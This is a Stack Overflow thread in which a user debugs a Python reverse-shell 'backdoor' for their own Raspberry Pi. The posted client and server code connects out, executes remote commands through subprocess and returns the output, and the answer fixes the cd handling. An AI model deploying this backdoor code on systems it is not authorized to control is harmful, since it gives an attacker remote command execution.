0

I am building 'backdoor' for my raspberry. so I have problem, after creating interactive shell, I can't change dir.

I edited my original code to make it short. I am trying to resolve this problem around 2-3 hours.

python3 - cd is not working in reverse shell - Not Working

Backdoor Shell doesn't allow me to change Directory - Not Working

Client:

import socket, json
import os
import subprocess
import sys

SERVER_HOST = '192.168.100.8'
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"


s = socket.socket()
s.connect((SERVER_HOST, SERVER_PORT))

snd = []

data = json.dumps({"cwd": os.getcwd(), "usr": os.getlogin()})
s.send(data.encode())

while True:
    command = s.recv(BUFFER_SIZE).decode()
    if command == 'shell':
        while True:
            command = s.recv(BUFFER_SIZE).decode()

            if command.lower() == "exit":
                break
            if command.startswith("cd "):
                try:
                    os.chdir(f'{os.getcwd()}/{str(command[3:])}')
                except FileNotFoundError as e:
                    output = str(e)
                else:
                    output = ""
            else:
                output = subprocess.getoutput(command)
            cwd = os.getcwd()
            message = f"{output}{SEPARATOR}{cwd}"
            s.send(message.encode())
            if command == 'exit':
                break
    else:
        if command.lower() == "exit":
            break
        else:
            output = subprocess.getoutput(command)
        cwd = os.getcwd()
        message = f"{output}{SEPARATOR}{cwd}"
        s.send(message.encode())
s.close()

Server:

import socket,json
import os

SERVER_HOST = "192.168.100.8"
SERVER_PORT = 4343
BUFFER_SIZE = 1024 * 128
SEPARATOR = "<sep>"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((SERVER_HOST, SERVER_PORT))
s.listen()

while True:
    client_socket, client_address = s.accept()

    data = json.loads(client_socket.recv(BUFFER_SIZE).decode())
    while True:
        print("TYPE SHELL")
        tmp = input(f"[*] Enter command: ")
        if tmp.lower() == 'shell':
                print("[*] Opening interactive shell")
                command = input(f"{data['cwd']} $: ")
                while command != 'exit':
                    if not command.strip():
                        continue
                    client_socket.send(command.encode())
                    output = client_socket.recv(BUFFER_SIZE).decode()
                    results, cwd = output.split(SEPARATOR)
                    print(results)
                    command = input(f"{data['cwd']} $: ")
                print('[!] Closing interactive shell')

This is what I see in the shell:

/home/pi $: is
1
Bookshelf 
client.py 
Desktop
Documents 
Downloads 
Music
Pictures 
Public
rm.sh
Templates 
Videos
/home/pi $: cd 1

/home/pi $: pwd
/home/pi
/home/pi $: mkdir 2 && cd 2 && touch 1 && ls && pwd 
1
/home/pi/2
/home/pi $:
mikef0x
  • 3
  • 3
  • Where is the code that splits up a command line containing `&&`? – Barmar Jun 17 '22 at 21:42
  • it does't splits it – mikef0x Jun 17 '22 at 21:52
  • That's why it doesn't work. You have `cd 2` after `&&`, but your code only checks for `cd` at the beginning of the command. `if command.startswith("cd "):` – Barmar Jun 17 '22 at 21:53
  • no i typed that to check if command is working. I mean only cd Directory is not working – mikef0x Jun 17 '22 at 21:54
  • cd 1 must work, it just dont change directory, os.chdir not working – mikef0x Jun 17 '22 at 21:56
  • The prompt shows `data['cwd']`. You never update this with the response from the client. – Barmar Jun 17 '22 at 22:07
  • that is not problem right now, i will fix that later, anyways pwd shows that i am in same directory – mikef0x Jun 17 '22 at 22:09
  • I'm trying to run the code here, but I'm confused about how to use it. First I have to type `shell` to get the server to start the interactive shell. Then I need to type it again to send `shell` to the client, so it will start its reverse shell. Is that right? – Barmar Jun 17 '22 at 22:32
  • But when I do that, the server doesn't prompt for another command, because it's waiting for something from the client, but the client doesn't send a response to the `shell` command. It's waiting for another input. So it's deadlocked. – Barmar Jun 17 '22 at 22:34
  • It looks like you never entered `shell` a second time. So you never go into the inner loop on the client that looks for `cd` commands. – Barmar Jun 17 '22 at 22:36
  • you just enter shell one time and then just enter command – mikef0x Jun 17 '22 at 22:37

1 Answers1

0

The server needs to send the shell command to the client when you start the reverse shell. Otherwise, the client won't go into the inner while loop that contains the code that looks for the cd command.

So add the line:

                client_socket.send("shell".encode())

before

                print("[*] Opening interactive shell")
Barmar
  • 741,623
  • 53
  • 500
  • 612